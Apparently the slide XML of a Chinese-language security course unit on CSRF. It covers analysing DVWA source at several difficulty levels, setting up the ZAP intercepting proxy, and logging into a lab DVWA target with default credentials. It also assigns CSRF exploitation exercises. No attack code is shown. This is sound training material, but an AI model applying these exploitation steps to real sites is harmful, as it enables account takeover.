            <p:custDataLst>
              <p:tags r:id="rId5"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3720465" y="4736465"/>
            <a:ext cx="4574264" cy="1260000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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80" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>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572770" y="1247775"/>
            <a:ext cx="11017250" cy="541337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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   3</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>分析Impossible级别的CSRF源代码</a:t>
            </a:r>
            <a:endParaRPr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800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2"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r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a: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2000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"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1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    可以看出，impossible级别修改密码需要输入之前的密码，攻击者在不知道用户之前的密码，无法进行CSRF攻击。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 -2147482609"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1929765" y="1692275"/>
            <a:ext cx="7032625" cy="4239260"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="375285"/>
            <a:ext cx="1107567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2800">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【任务实施二：分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>medium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2800">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>high</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2800">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2500">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>impossible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2800">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>级别的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2800">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2800">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>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64615"/>
            <a:ext cx="11263630" cy="5060950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、设置拦截代理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" kern="100" dirty="0">
              <a:effectLst/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>切换到ZAP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ZAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>菜单中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>点击工具，点击选项…，点击Local Proxies，设置Address为localhost，端口为8080，点击OK，完成设置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400" b="1" kern="100" dirty="0">
              <a:effectLst/>
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 73"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect r="673" b="31102"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2078990" y="2569845"/>
            <a:ext cx="7207885" cy="3787775"/>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spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>完成low级别的CSRF漏洞的利用。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="469900" indent="-469900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>完成medium、high和impossible级别的CSRF源代码的分析。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="469900" indent="-469900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>完成medium和high的CSRF漏洞的利用。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>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42275"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2295525" y="2428240"/>
          <a:ext cx="8157845" cy="3762375"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1069975"/>
                <a:gridCol w="422021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项目名称：6.7 CSRF</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>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CSRF</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>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eaLnBrk="0" hangingPunct="0">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="CC0000"/>
                        </a:buClr>
                        <a:buSzTx/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>CSRF漏洞的</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>利用和防御措施</a:t>
                      </a:r>
                      <a:endParaRPr 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3" name="表格 2"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>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sz="1600">
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>6.7 CSRF漏洞</a:t>
                      </a:r>
                      <a:endParaRPr sz="1600">
                        <a:sym typeface="+mn-ea"/>
                      </a:endParaRPr>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="组合 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="533756" y="1853381"/>
            <a:ext cx="4302496" cy="638783"/>
            <a:chOff x="6627851" y="1754191"/>
            <a:chExt cx="4302496" cy="638783"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId6"/>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6" name="矩形 5"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7"/>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12" name="文本框 570"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId8"/>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13" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId9"/>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【任务拓展】</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60515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7 CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>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对靶机Metasploitable2-Linux的DVWA进行CSRF漏洞的利用。</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421130" y="1277620"/>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本章内容结束</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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1224915" y="2274570"/>
            <a:ext cx="8773795" cy="387985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72235"/>
            <a:ext cx="11132820" cy="2159000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:sp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5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、使用拦截代理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin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cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin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cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>打开Firefox浏览器，访问DVWA系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://192.168.66.133/dvwa/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern="100" dirty="0">
              <a:effectLst/>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400" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）在Username中输入admin，在Password中输入password，点击Login，登录到DVWA系统。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
              <a:effectLst/>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）选择点击Brute Force选项，进入Brute Force界面。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 -2147482478"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="9054" t="15689" r="10583" b="44065"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2240915" y="3586480"/>
            <a:ext cx="7277735" cy="2632075"/>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34135"/>
            <a:ext cx="10901680" cy="90868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5</a:t>
            </a:r>
            <a:r>
